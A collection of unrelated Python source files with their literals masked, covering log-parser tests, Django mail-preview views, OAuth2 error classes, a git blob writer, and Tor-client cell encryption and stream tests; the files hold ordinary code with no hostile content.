<NUM_LIT:1> ] = '<STR_LIT>' <EOL> log_line [ <NUM_LIT:4> ] = '<STR_LIT>' <EOL> query = '<STR_LIT>' <EOL> log_line [ <NUM_LIT:6> ] = '<STR_LIT>' % query <EOL> log_line = '<STR_LIT:x>' * <NUM_LIT:16> + '<STR_LIT:U+0020>' . join ( log_line ) <EOL> res = p . log_line_parser ( log_line ) <EOL> self . assertEquals ( res [ '<STR_LIT:object_name>' ] , None ) <EOL> self . assertEquals ( res [ '<STR_LIT>' ] , None ) <EOL> self . assertEquals ( res [ '<STR_LIT>' ] , '<STR_LIT:a>' ) <EOL> self . assertEquals ( res [ '<STR_LIT>' ] , '<STR_LIT>' ) <EOL> self . assertEquals ( res [ '<STR_LIT>' ] , query ) <EOL> def test_log_line_parser_field_count ( self ) : <EOL> p = access_processor . AccessLogProcessor ( { } ) <EOL> log_line = [ str ( x ) for x in range ( <NUM_LIT> ) ] <EOL> log_line [ <NUM_LIT:1> ] = '<STR_LIT>' <EOL> log_line [ <NUM_LIT:4> ] = '<STR_LIT>' <EOL> log_line [ <NUM_LIT:6> ] = '<STR_LIT>' <EOL> log_line = '<STR_LIT:x>' * <NUM_LIT:16> + '<STR_LIT:U+0020>' . join ( log_line ) <EOL> res = p . log_line_parser ( log_line ) <EOL> expected = { } <EOL> self . assertEquals ( res , expected ) <EOL> log_line = [ str ( x ) for x in range ( <NUM_LIT> ) ] <EOL> log_line [ <NUM_LIT:1> ] = '<STR_LIT>' <EOL> log_line [ <NUM_LIT:4> ] = '<STR_LIT>' <EOL> log_line [ <NUM_LIT:6> ] = '<STR_LIT>' <EOL> log_line = '<STR_LIT:x>' * <NUM_LIT:16> + '<STR_LIT:U+0020>' . join ( log_line ) <EOL> res = p . log_line_parser ( log_line ) <EOL> expected = { '<STR_LIT:code>' : <NUM_LIT:8> , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT:3>' , '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT:object_name>' : '<STR_LIT:o>' , '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT:5>' , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT:2>' , <EOL> '<STR_LIT>' : <NUM_LIT> , '<STR_LIT>' : '<STR_LIT:c>' , '<STR_LIT>' : '<STR_LIT:1>' , <EOL> '<STR_LIT>' : '<STR_LIT:5>' , '<STR_LIT>' : '<STR_LIT:a>' , '<STR_LIT>' : '<STR_LIT:4>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : <NUM_LIT:12> , '<STR_LIT>' : '<STR_LIT:3>' , <EOL> '<STR_LIT>' : None } <EOL> self . assertEquals ( res , expected ) <EOL> log_line = [ str ( x ) for x in range ( <NUM_LIT> ) ] <EOL> log_line [ <NUM_LIT:1> ] = '<STR_LIT>' <EOL> log_line [ <NUM_LIT:4> ] = '<STR_LIT>' <EOL> log_line [ <NUM_LIT:6> ] = '<STR_LIT>' <EOL> log_line = '<STR_LIT:x>' * <NUM_LIT:16> + '<STR_LIT:U+0020>' . join ( log_line ) <EOL> res = p . log_line_parser ( log_line ) <EOL> expected = { '<STR_LIT:code>' : <NUM_LIT:8> , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT:3>' , '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT:object_name>' : '<STR_LIT:o>' , '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT:5>' , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT:2>' , <EOL> '<STR_LIT>' : <NUM_LIT> , '<STR_LIT>' : '<STR_LIT:c>' , '<STR_LIT>' : '<STR_LIT:1>' , <EOL> '<STR_LIT>' : '<STR_LIT:5>' , '<STR_LIT>' : '<STR_LIT:a>' , '<STR_LIT>' : '<STR_LIT:4>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : <NUM_LIT:12> , '<STR_LIT>' : '<STR_LIT:3>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } <EOL> self . assertEquals ( res , expected ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> unittest . main ( ) </s>
<s> """<STR_LIT>""" <EOL> from django_docusign . backend import DocuSignBackend <EOL> from django_docusign . forms import SignerForm <EOL> from django_docusign . views import SignatureCallbackView </s>
<s> from django . shortcuts import redirect <EOL> from django . conf import settings <EOL> from django . http import Http404 , HttpResponse <EOL> from django . template . base import TemplateDoesNotExist <EOL> from django . views . generic import TemplateView , FormView <EOL> from django . contrib . auth . decorators import user_passes_test <EOL> from django . contrib import messages <EOL> from . import factory , exceptions <EOL> admin_required = user_passes_test ( lambda x : x . is_superuser ) <EOL> class MailListView ( TemplateView ) : <EOL> """<STR_LIT>""" <EOL> template_name = '<STR_LIT>' <EOL> def get_context_data ( self , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> data = super ( MailListView , self ) . get_context_data ( ** kwargs ) <EOL> mail_list = [ ] <EOL> for mail_name , mail_class in sorted ( factory . _registry . items ( ) , <EOL> key = lambda x : x [ <NUM_LIT:0> ] ) : <EOL> mail_list . append ( ( mail_name , mail_class . __name__ ) ) <EOL> data [ '<STR_LIT>' ] = mail_list <EOL> return data <EOL> class MailPreviewMixin ( object ) : <EOL> def get_html_alternative ( self , message ) : <EOL> """<STR_LIT>""" <EOL> alternatives = dict ( ( v , k ) for k , v in message . alternatives ) <EOL> if '<STR_LIT>' in alternatives : <EOL> return alternatives [ '<STR_LIT>' ] <EOL> def get_mail_preview ( self , template_name , lang , cid_to_data = False ) : <EOL> """<STR_LIT>""" <EOL> form_class = factory . get_mail_form ( self . mail_name ) <EOL> form = form_class ( mail_class = self . mail_class ) <EOL> form = form_class ( form . get_context_data ( ) , mail_class = self . mail_class ) <EOL> data = form . get_context_data ( ) <EOL> if form . is_valid ( ) : <EOL> data . update ( form . cleaned_data ) <EOL> data . update ( form . get_preview_data ( ) ) <EOL> mail = self . mail_class ( data ) <EOL> message = mail . create_email_msg ( [ settings . ADMINS ] , lang = lang ) <EOL> try : <EOL> message . html = factory . get_html_for ( self . mail_name , data , <EOL> lang = lang , cid_to_data = True ) <EOL> except TemplateDoesNotExist : <EOL> message . html = False <EOL> return message <EOL> class MailFormView ( MailPreviewMixin , FormView ) : <EOL> template_name = '<STR_LIT>' <EOL> def dispatch ( self , request , mail_name ) : <EOL> self . mail_name = mail_name <EOL> try : <EOL> self . mail_class = factory . get_mail_class ( self . mail_name ) <EOL> except exceptions . MailFactoryError : <EOL> raise Http404 <EOL> self . raw = '<STR_LIT>' in request . POST <EOL> self . send = '<STR_LIT>' in request . POST <EOL> self . email = request . POST . get ( '<STR_LIT:email>' ) <EOL> return super ( MailFormView , self ) . dispatch ( request ) <EOL> def get_form_kwargs ( self ) : <EOL> kwargs = super ( MailFormView , self ) . get_form_kwargs ( ) <EOL> kwargs [ '<STR_LIT>' ] = self . mail_class <EOL> return kwargs <EOL> def get_form_class ( self ) : <EOL> return factory . get_mail_form ( self . mail_name ) <EOL> def form_valid ( self , form ) : <EOL> if self . raw : <EOL> return HttpResponse ( '<STR_LIT>' % <EOL> factory . get_raw_content ( <EOL> self . mail_name , <EOL> [ settings . DEFAULT_FROM_EMAIL ] , <EOL> form . cleaned_data ) . message ( ) ) <EOL> if self . send : <EOL> factory . mail ( self . mail_name , [ self . email ] , form . cleaned_data ) <EOL> messages . success ( self . request , <EOL> '<STR_LIT>' % ( self . mail_name , <EOL> self . email ) ) <EOL> return redirect ( '<STR_LIT>' ) <EOL> data = None <EOL> if form : <EOL> data = form . get_context_data ( ) <EOL> if hasattr ( form , '<STR_LIT>' ) : <EOL> data . update ( form . cleaned_data ) <EOL> try : <EOL> html = factory . get_html_for ( self . mail_name , data , <EOL> cid_to_data = True ) <EOL> except TemplateDoesNotExist : <EOL> return redirect ( '<STR_LIT>' , <EOL> mail_name = self . mail_name ) <EOL> return HttpResponse ( html ) <EOL> def get_context_data ( self , ** kwargs ) : <EOL> data = super ( MailFormView , self ) . get_context_data ( ** kwargs ) <EOL> data [ '<STR_LIT>' ] = self . mail_name <EOL> preview_messages = { } <EOL> for lang_code , lang_name in settings . LANGUAGES : <EOL> message = self . get_mail_preview ( self . mail_name , lang_code ) <EOL> preview_messages [ lang_code ] = message <EOL> data [ '<STR_LIT>' ] = preview_messages <EOL> return data <EOL> class HTMLNotFoundView ( TemplateView ) : <EOL> """<STR_LIT>""" <EOL> template_name = '<STR_LIT>' <EOL> class MailPreviewMessageView ( MailPreviewMixin , TemplateView ) : <EOL> template_name = '<STR_LIT>' <EOL> def dispatch ( self , request , mail_name , lang ) : <EOL> self . mail_name = mail_name <EOL> self . lang = lang <EOL> try : <EOL> self . mail_class = factory . get_mail_class ( self . mail_name ) <EOL> except exceptions . MailFactoryError : <EOL> raise Http404 <EOL> return super ( MailPreviewMessageView , self ) . dispatch ( request ) <EOL> def get_context_data ( self , ** kwargs ) : <EOL> data = super ( MailPreviewMessageView , self ) . get_context_data ( ** kwargs ) <EOL> message = self . get_mail_preview ( self . mail_name , self . lang ) <EOL> data [ '<STR_LIT>' ] = self . mail_name <EOL> data [ '<STR_LIT:message>' ] = message <EOL> return data <EOL> mail_list = admin_required ( MailListView . as_view ( ) ) <EOL> form = admin_required ( MailFormView . as_view ( ) ) <EOL> html_not_found = admin_required ( HTMLNotFoundView . as_view ( ) ) <EOL> preview_message = admin_required ( MailPreviewMessageView . as_view ( ) ) </s>
<s> from django import forms <EOL> from complaints . models import Complaint <EOL> class ComplaintForm ( forms . ModelForm ) : <EOL> def save ( self , request = None , * args , ** kwargs ) : <EOL> kwargs [ '<STR_LIT>' ] = False <EOL> obj = super ( ComplaintForm , self ) . save ( * args , ** kwargs ) <EOL> obj . save ( request ) <EOL> return obj <EOL> class Meta : <EOL> model = Complaint <EOL> exclude = ( '<STR_LIT>' , '<STR_LIT>' , ) </s>
<s> import os , sys , sha , zlib <EOL> content = sys . stdin . read ( ) <EOL> type = '<STR_LIT>' <EOL> object = '<STR_LIT>' % ( type , len ( content ) , content ) <EOL> sha1sum = sha . new ( object ) . hexdigest ( ) <EOL> container = '<STR_LIT>' % sha1sum [ : <NUM_LIT:2> ] <EOL> if not os . path . exists ( container ) : <EOL> os . mkdir ( container ) <EOL> open ( '<STR_LIT>' % ( container , sha1sum [ <NUM_LIT:2> : ] ) , '<STR_LIT:w>' ) . write ( zlib . compress ( object ) ) <EOL> print sha1sum </s>
<s> """<STR_LIT>""" <EOL> from __future__ import unicode_literals <EOL> import json <EOL> from oauthlib . common import urlencode , add_params_to_uri <EOL> class OAuth2Error ( Exception ) : <EOL> error = None <EOL> status_code = <NUM_LIT> <EOL> description = '<STR_LIT>' <EOL> def __init__ ( self , description = None , uri = None , state = None , status_code = None , <EOL> request = None ) : <EOL> """<STR_LIT>""" <EOL> self . description = description or self . description <EOL> message = '<STR_LIT>' % ( self . error , self . description ) <EOL> if request : <EOL> message += '<STR_LIT:U+0020>' + repr ( request ) <EOL> super ( OAuth2Error , self ) . __init__ ( message ) <EOL> self . uri = uri <EOL> self . state = state <EOL> if status_code : <EOL> self . status_code = status_code <EOL> if request : <EOL> self . redirect_uri = request . redirect_uri <EOL> self . client_id = request . client_id <EOL> self . scopes = request . scopes <EOL> self . response_type = request . response_type <EOL> self . grant_type = request . grant_type <EOL> if not state : <EOL> self . state = request . state <EOL> def in_uri ( self , uri ) : <EOL> return add_params_to_uri ( uri , self . twotuples ) <EOL> @ property <EOL> def twotuples ( self ) : <EOL> error = [ ( '<STR_LIT:error>' , self . error ) ] <EOL> if self . description : <EOL> error . append ( ( '<STR_LIT>' , self . description ) ) <EOL> if self . uri : <EOL> error . append ( ( '<STR_LIT>' , self . uri ) ) <EOL> if self . state : <EOL> error . append ( ( '<STR_LIT:state>' , self . state ) ) <EOL> return error <EOL> @ property <EOL> def urlencoded ( self ) : <EOL> return urlencode ( self . twotuples ) <EOL> @ property <EOL> def json ( self ) : <EOL> return json . dumps ( dict ( self . twotuples ) ) <EOL> class TokenExpiredError ( OAuth2Error ) : <EOL> error = '<STR_LIT>' <EOL> class InsecureTransportError ( OAuth2Error ) : <EOL> error = '<STR_LIT>' <EOL> description = '<STR_LIT>' <EOL> class MismatchingStateError ( OAuth2Error ) : <EOL> error = '<STR_LIT>' <EOL> description = '<STR_LIT>' <EOL> class MissingCodeError ( OAuth2Error ) : <EOL> error = '<STR_LIT>' <EOL> class MissingTokenError ( OAuth2Error ) : <EOL> error = '<STR_LIT>' <EOL> class MissingTokenTypeError ( OAuth2Error ) : <EOL> error = '<STR_LIT>' <EOL> class FatalClientError ( OAuth2Error ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> class InvalidRedirectURIError ( FatalClientError ) : <EOL> error = '<STR_LIT>' <EOL> class MissingRedirectURIError ( FatalClientError ) : <EOL> error = '<STR_LIT>' <EOL> class MismatchingRedirectURIError ( FatalClientError ) : <EOL> error = '<STR_LIT>' <EOL> class MissingClientIdError ( FatalClientError ) : <EOL> error = '<STR_LIT>' <EOL> class InvalidClientIdError ( FatalClientError ) : <EOL> error = '<STR_LIT>' <EOL> class InvalidRequestError ( OAuth2Error ) : <EOL> """<STR_LIT>""" <EOL> error = '<STR_LIT>' <EOL> class AccessDeniedError ( OAuth2Error ) : <EOL> """<STR_LIT>""" <EOL> error = '<STR_LIT>' <EOL> status_code = <NUM_LIT> <EOL> class UnsupportedResponseTypeError ( OAuth2Error ) : <EOL> """<STR_LIT>""" <EOL> error = '<STR_LIT>' <EOL> class InvalidScopeError ( OAuth2Error ) : <EOL> """<STR_LIT>""" <EOL> error = '<STR_LIT>' <EOL> status_code = <NUM_LIT> <EOL> class ServerError ( OAuth2Error ) : <EOL> """<STR_LIT>""" <EOL> error = '<STR_LIT>' <EOL> class TemporarilyUnavailableError ( OAuth2Error ) : <EOL> """<STR_LIT>""" <EOL> error = '<STR_LIT>' <EOL> class InvalidClientError ( OAuth2Error ) : <EOL> """<STR_LIT>""" <EOL> error = '<STR_LIT>' <EOL> status_code = <NUM_LIT> <EOL> class InvalidGrantError ( OAuth2Error ) : <EOL> """<STR_LIT>""" <EOL> error = '<STR_LIT>' <EOL> status_code = <NUM_LIT> <EOL> class UnauthorizedClientError ( OAuth2Error ) : <EOL> """<STR_LIT>""" <EOL> error = '<STR_LIT>' <EOL> status_code = <NUM_LIT> <EOL> class UnsupportedGrantTypeError ( OAuth2Error ) : <EOL> """<STR_LIT>""" <EOL> error = '<STR_LIT>' <EOL> class UnsupportedTokenTypeError ( OAuth2Error ) : <EOL> """<STR_LIT>""" <EOL> error = '<STR_LIT>' <EOL> def raise_from_error ( error , params = None ) : <EOL> import inspect <EOL> import sys <EOL> kwargs = { <EOL> '<STR_LIT:description>' : params . get ( '<STR_LIT>' ) , <EOL> '<STR_LIT>' : params . get ( '<STR_LIT>' ) , <EOL> '<STR_LIT:state>' : params . get ( '<STR_LIT:state>' ) <EOL> } <EOL> for _ , cls in inspect . getmembers ( sys . modules [ __name__ ] , inspect . isclass ) : <EOL> if cls . error == error : <EOL> raise cls ( ** kwargs ) </s>
<s> from __future__ import absolute_import <EOL> from . facebook import facebook_compliance_fix <EOL> from . linkedin import linkedin_compliance_fix <EOL> from . weibo import weibo_compliance_fix </s>
<s> '''<STR_LIT>''' <EOL> import hashlib <EOL> import hmac <EOL> import struct <EOL> from collections import namedtuple <EOL> from datetime import datetime <EOL> from itertools import izip <EOL> import OpenSSL <EOL> from Crypto . Cipher import AES <EOL> from Crypto . Util import asn1 , Counter <EOL> from oppy . cell . cell import Cell <EOL> from oppy . cell . definitions import RECOGNIZED , EMPTY_DIGEST <EOL> from oppy . cell . fixedlen import EncryptedCell <EOL> class UnrecognizedCell ( Exception ) : <EOL> pass <EOL> RelayCrypto = namedtuple ( "<STR_LIT>" , ( "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" ) ) <EOL> def constantStrEqual ( str1 , str2 ) : <EOL> '''<STR_LIT>''' <EOL> try : <EOL> from hmac import compare_digest <EOL> return compare_digest ( str1 , str2 ) <EOL> except ImportError : <EOL> pass <EOL> if len ( str1 ) != len ( str2 ) : <EOL> res = <NUM_LIT:1> <EOL> comp1 = bytearray ( str2 ) <EOL> comp2 = bytearray ( str2 ) <EOL> else : <EOL> res = <NUM_LIT:0> <EOL> comp1 = bytearray ( str1 ) <EOL> comp2 = bytearray ( str2 ) <EOL> for a , b in izip ( comp1 , comp2 ) : <EOL> res |= a ^ b <EOL> return res == <NUM_LIT:0> <EOL> def constantStrAllZero ( s ) : <EOL> '''<STR_LIT>''' <EOL> return constantStrEqual ( s , '<STR_LIT:\x00>' * len ( s ) ) <EOL> def makeAES128CTRCipher ( key , initial_value = <NUM_LIT:0> ) : <EOL> '''<STR_LIT>''' <EOL> ctr = Counter . new ( <NUM_LIT> , initial_value = initial_value ) <EOL> return AES . new ( key , AES . MODE_CTR , counter = ctr ) <EOL> def makeHMACSHA256 ( msg , key ) : <EOL> '''<STR_LIT>''' <EOL> t = hmac . new ( msg = msg , key = key , digestmod = hashlib . sha256 ) <EOL> return t . digest ( ) <EOL> def _makePayloadWithDigest ( payload , digest = EMPTY_DIGEST ) : <EOL> '''<STR_LIT>''' <EOL> assert len ( payload ) >= <NUM_LIT:9> and len ( digest ) == <NUM_LIT:4> <EOL> DIGEST_START = <NUM_LIT:5> <EOL> DIGEST_END = <NUM_LIT:9> <EOL> return payload [ : DIGEST_START ] + digest + payload [ DIGEST_END : ] <EOL> def encryptCell ( cell , crypt_path , early = False ) : <EOL> '''<STR_LIT>''' <EOL> assert cell . rheader . digest == EMPTY_DIGEST <EOL> crypt_path [ - <NUM_LIT:1> ] . forward_digest . update ( cell . getPayload ( ) ) <EOL> cell . rheader . digest = crypt_path [ - <NUM_LIT:1> ] . forward_digest . digest ( ) [ : <NUM_LIT:4> ] <EOL> payload = cell . getPayload ( ) <EOL> for node in reversed ( crypt_path ) : <EOL> payload = node . forward_cipher . encrypt ( payload ) <EOL> return EncryptedCell . make ( cell . header . circ_id , payload , early = early ) <EOL> def _cellRecognized ( payload , relay_crypto ) : <EOL> '''<STR_LIT>''' <EOL> if len ( payload ) < <NUM_LIT:9> or payload [ <NUM_LIT:2> : <NUM_LIT:4> ] != RECOGNIZED : <EOL> return False <EOL> digest = payload [ <NUM_LIT:5> : <NUM_LIT:9> ] <EOL> test_payload = _makePayloadWithDigest ( payload ) <EOL> test_digest = relay_crypto . backward_digest . copy ( ) <EOL> test_digest . update ( test_payload ) <EOL> return test_digest . digest ( ) [ : <NUM_LIT:4> ] == digest <EOL> def decryptCell ( cell , crypt_path ) : <EOL> '''<STR_LIT>''' <EOL> origin = <NUM_LIT:0> <EOL> recognized = False <EOL> payload = cell . getPayload ( ) <EOL> for node in crypt_path : <EOL> payload = node . backward_cipher . decrypt ( payload ) <EOL> if _cellRecognized ( payload , node ) : <EOL> recognized = True <EOL> break <EOL> origin += <NUM_LIT:1> <EOL> if not recognized : <EOL> raise UnrecognizedCell ( ) <EOL> updated_payload = _makePayloadWithDigest ( payload ) <EOL> crypt_path [ origin ] . backward_digest . update ( updated_payload ) <EOL> if cell . header . link_version < <NUM_LIT:4> : <EOL> cid = struct . pack ( '<STR_LIT>' , cell . header . circ_id ) <EOL> else : <EOL> cid = struct . pack ( '<STR_LIT>' , cell . header . circ_id ) <EOL> cmd = struct . pack ( '<STR_LIT>' , cell . header . cmd ) <EOL> dec = Cell . parse ( cid + cmd + payload ) <EOL> return ( dec , origin ) <EOL> def verifyCertSig ( id_cert , cert_to_verify , algo = '<STR_LIT>' ) : <EOL> '''<STR_LIT>''' <EOL> cert_to_verify_ASN1 = OpenSSL . crypto . dump_certificate ( <EOL> OpenSSL . crypto . FILETYPE_ASN1 , cert_to_verify ) <EOL> der = asn1 . DerSequence ( ) <EOL> der . decode ( cert_to_verify_ASN1 ) <EOL> cert_to_verify_DER = der [ <NUM_LIT:0> ] <EOL> cert_to_verify_ALGO = der [ <NUM_LIT:1> ] <EOL> cert_to_verify_SIG = der [ <NUM_LIT:2> ] <EOL> sig_DER = asn1 . DerObject ( ) <EOL> sig_DER . decode ( cert_to_verify_SIG ) <EOL> sig = sig_DER . payload <EOL> if sig [ <NUM_LIT:0> ] != '<STR_LIT:\x00>' : <EOL> return False <EOL> sig = sig [ <NUM_LIT:1> : ] <EOL> try : <EOL> OpenSSL . crypto . verify ( id_cert , sig , cert_to_verify_DER , algo ) <EOL> return True <EOL> except OpenSSL . crypto . Error : <EOL> return False <EOL> def validCertTime ( cert ) : <EOL> '''<STR_LIT>''' <EOL> now = datetime . now ( ) <EOL> try : <EOL> validAfter = datetime . strptime ( cert . get_notBefore ( ) , '<STR_LIT>' ) <EOL> validUntil = datetime . strptime ( cert . get_notAfter ( ) , '<STR_LIT>' ) <EOL> return validAfter < now < validUntil <EOL> except ValueError : <EOL> return False </s>
<s> import mock <EOL> from twisted . trial import unittest <EOL> from oppy . stream import stream <EOL> class StreamTest ( unittest . TestCase ) : <EOL> @ mock . patch ( '<STR_LIT>' , autospec = True ) <EOL> @ mock . patch ( '<STR_LIT>' , autospec = True ) <EOL> @ mock . patch ( '<STR_LIT>' , autospec = True ) <EOL> @ mock . patch ( '<STR_LIT>' , autospec = True ) <EOL> def setUp ( self , mock_dq , mock_er , mock_osp , mock_cm ) : <EOL> self . mock_er = mock_er <EOL> self . mock_osp = mock_osp <EOL> self . mock_cm = mock_cm <EOL> self . mock_dq = mock_dq <EOL> self . stream = stream . Stream ( self . mock_cm , self . mock_er , self . mock_osp ) <EOL> self . log_patch = mock . patch ( '<STR_LIT>' ) <EOL> self . mock_log = self . log_patch . start ( ) <EOL> def test_recv ( self ) : <EOL> self . stream . recv ( '<STR_LIT:test>' ) <EOL> self . stream . _read_queue . put . assert_called_once_with ( '<STR_LIT:test>' ) <EOL> @ mock . patch ( '<STR_LIT>' , return_value = [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> def test_send ( self , mock_crd ) : <EOL> self . stream . send ( '<STR_LIT:test>' ) <EOL> self . assertEqual ( self . stream . _write_queue . put . call_count , <NUM_LIT:2> ) <EOL> self . assertEqual ( self . stream . _write_queue . put . call_args_list , <EOL> [ mock . call ( '<STR_LIT>' ) , mock . call ( '<STR_LIT>' ) ] ) <EOL> def test_incrementPackageWindow_normal ( self ) : <EOL> self . stream . _pollWriteQueue = mock . Mock ( ) <EOL> self . stream . _write_deferred = '<STR_LIT>' <EOL> self . stream . _package_window = <NUM_LIT:1> <EOL> self . stream . incrementPackageWindow ( ) <EOL> self . assertEqual ( self . stream . _package_window , <EOL> stream . STREAM_WINDOW_SIZE + <NUM_LIT:1> ) <EOL> self . assertEqual ( self . stream . _pollWriteQueue . call_count , <NUM_LIT:0> ) <EOL> def test_incrementPackageWindow_buffering ( self ) : <EOL> self . stream . _pollWriteQueue = mock . Mock ( ) <EOL> self . stream . _write_deferred = None <EOL> self . stream . _package_window = <NUM_LIT:0> <EOL> self . stream . incrementPackageWindow ( ) <EOL> self . assertEqual ( self . stream . _package_window , <EOL> stream . STREAM_WINDOW_SIZE ) <EOL> self . assertEqual ( self . stream . _pollWriteQueue . call_count , <NUM_LIT:1> ) <EOL> def test_streamConnected ( self ) : <EOL> self . stream . _pollWriteQueue = mock . Mock ( ) <EOL> self . stream . streamConnected ( ) <EOL> self . assertEqual ( self . stream . _pollWriteQueue . call_count , <NUM_LIT:1> ) <EOL> def test_closeFromCircuit ( self ) : <EOL> self . stream . circuit = mock . Mock ( ) <EOL> self . stream . circuit_id = '<STR_LIT:test>' <EOL> self . stream . closeFromCircuit ( ) <EOL> self . assertEqual ( self . stream . socks . closeFromStream . call_count , <NUM_LIT:1> ) <EOL> self . assertTrue ( self . stream . _closed ) <EOL> def test_closeFromSOCKS_no_circuit ( self ) : <EOL> self . stream . circuit = None <EOL> self . stream . closeFromSOCKS ( ) <EOL> self . assertTrue ( self . stream . _closed ) <EOL> def test_closeFromSOCKS_circuit ( self ) : <EOL> self . stream . circuit = mock . Mock ( ) <EOL> self . stream . circuit . removeStream = mock . Mock ( ) <EOL> self . stream . closeFromSOCKS ( ) <EOL> self . stream . circuit . removeStream . assert_called_once_with ( self . stream ) <EOL> self . assertTrue ( self . stream . _closed ) <EOL> def test_registerNewStream_closed ( self ) : <EOL> mock_circuit = mock . Mock ( ) <EOL> mock_circuit . addStreamAndSetStreamID = mock . Mock ( ) <EOL> self . stream . _closed = True <EOL> self . stream . _registerNewStream ( mock_circuit ) <EOL> self . assertEqual ( mock_circuit . addStreamAndSetStreamID . call_count , <NUM_LIT:0> ) <EOL> def test_registerNewStream ( self ) : <EOL> mock_circuit = mock . Mock ( ) <EOL> mock_circuit . addStreamAndSetStreamID = mock . Mock ( ) <EOL> mock_circuit . beginStream = mock . Mock ( ) <EOL> self . stream . _pollReadQueue = mock . Mock ( ) <EOL> self . stream . _circuit_request = '<STR_LIT:test>' <EOL> self . stream . _registerNewStream ( mock_circuit ) <EOL> self . assertEqual ( self . stream . circuit , mock_circuit ) <EOL> self . assertEqual ( self . stream . _circuit_request , None ) <EOL> mock_circuit . addStreamAndSetStreamID . assert_called_once_with ( <EOL> self . stream ) <EOL> mock_circuit . beginStream . assert_called_once_with ( self . stream ) <EOL> self . assertEqual ( self . stream . _pollReadQueue . call_count , <NUM_LIT:1> ) <EOL> def test_pollWriteQueue ( self ) : <EOL> mock_wd = mock . Mock ( ) <EOL> mock_wd . addCallback = mock . Mock ( ) <EOL> self . stream . _write_queue . get . return_value = mock_wd <EOL> self . stream . _pollWriteQueue ( ) <EOL> self . assertEqual ( self . stream . _write_deferred , mock_wd ) <EOL> mock_wd . addCallback . assert_called_once_with ( self . stream . _writeData ) <EOL> def test_pollReadQueue ( self ) : <EOL> mock_rd = mock . Mock ( ) <EOL> mock_rd . addCallback = mock . Mock ( ) <EOL> self . stream . _read_queue . get . return_value = mock_rd <EOL> self . stream . _pollReadQueue ( ) <EOL> self . assertEqual ( self . stream . _read_deferred , mock_rd ) <EOL> mock_rd . addCallback . assert_called_once_with ( self . stream . _recvData ) <EOL> def test_writeData ( self ) : <EOL> self . stream . _decPackageWindow = mock . Mock ( ) <EOL> self . stream . circuit = mock . Mock ( ) <EOL> self . stream . circuit . send = mock . Mock ( ) <EOL> self . stream . _writeData ( '<STR_LIT:test>' ) <EOL> self . stream . circuit . send . assert_called_once_with ( '<STR_LIT:test>' , self . stream ) <EOL> self . assertEqual ( self . stream . _decPackageWindow . call_count , <NUM_LIT:1> ) <EOL> def test_recvData ( self ) : <EOL> self . stream . _decDeliverWindow = mock . Mock ( ) <EOL> self . stream . _recvData ( '<STR_LIT:test>' ) <EOL> self . stream . socks . recv . assert_called_once_with ( '<STR_LIT:test>' ) <EOL> self . assertEqual ( self . stream . _decDeliverWindow . call_count , <NUM_LIT:1> ) <EOL> def test_decDeliverWindow_above_threshold ( self ) : <EOL> self . stream . _deliver_window = <NUM_LIT> <EOL> self . stream . _pollReadQueue = mock . Mock ( ) <EOL> self . stream . _decDeliverWindow ( ) <EOL> self . assertEqual ( self . stream . _deliver_window , <NUM_LIT> ) <EOL> self . assertEqual ( self . stream . _pollReadQueue . call_count , <NUM_LIT:1> ) <EOL> def test_decDeliverWindow_at_threshold ( self ) : <EOL> self . stream . _deliver_window = <NUM_LIT> <EOL> self . stream . circuit = mock . Mock ( ) <EOL> self . stream . circuit . sendStreamSendMe = mock . Mock ( ) <EOL> self . stream . _pollReadQueue = mock . Mock ( ) <EOL> self . stream . _decDeliverWindow ( ) <EOL> self . assertEqual ( self . stream . _deliver_window , <NUM_LIT> ) <EOL> self . stream . circuit . sendStreamSendMe . assert_called_once_with ( <EOL> self . stream ) <EOL> self . assertEqual ( self . stream . _pollReadQueue . call_count , <NUM_LIT:1> ) <EOL> def test_decPackageWindow_above_threshold ( self ) : <EOL> self . stream . _package_window = <NUM_LIT:2> <EOL> self . stream . _pollWriteQueue = mock . Mock ( ) <EOL> self . stream . _decPackageWindow ( ) <EOL> self . assertEqual ( self . stream . _package_window , <NUM_LIT:1> ) <EOL> self . assertEqual ( self . stream . _pollWriteQueue . call_count , <NUM_LIT:1> ) <EOL> def test_packageWindow_at_threshold ( self ) : <EOL> self . stream . _package_window = <NUM_LIT:1> <EOL> self . stream . _pollWriteQueue = mock . Mock ( ) <EOL> self . stream . _decPackageWindow ( ) <EOL> self . assertEqual ( self . stream . _package_window , <NUM_LIT:0> ) <EOL> self . assertEqual ( self . stream . _pollWriteQueue . call_count , <NUM_LIT:0> ) <EOL> self . assertEqual ( self . stream . _write_deferred , None ) <EOL> def test_chunkRelayData ( self ) : <EOL> data = '<STR_LIT:\x00>' * ( stream . MAX_RPAYLOAD_LEN * <NUM_LIT:2> ) <EOL> data += '<STR_LIT:\x00>' * ( stream . MAX_RPAYLOAD_LEN - <NUM_LIT:1> ) <EOL> ret = stream . _chunkRelayData ( data ) <EOL> self . assertEqual ( ret , <EOL> [ '<STR_LIT:\x00>' * stream . MAX_RPAYLOAD_LEN 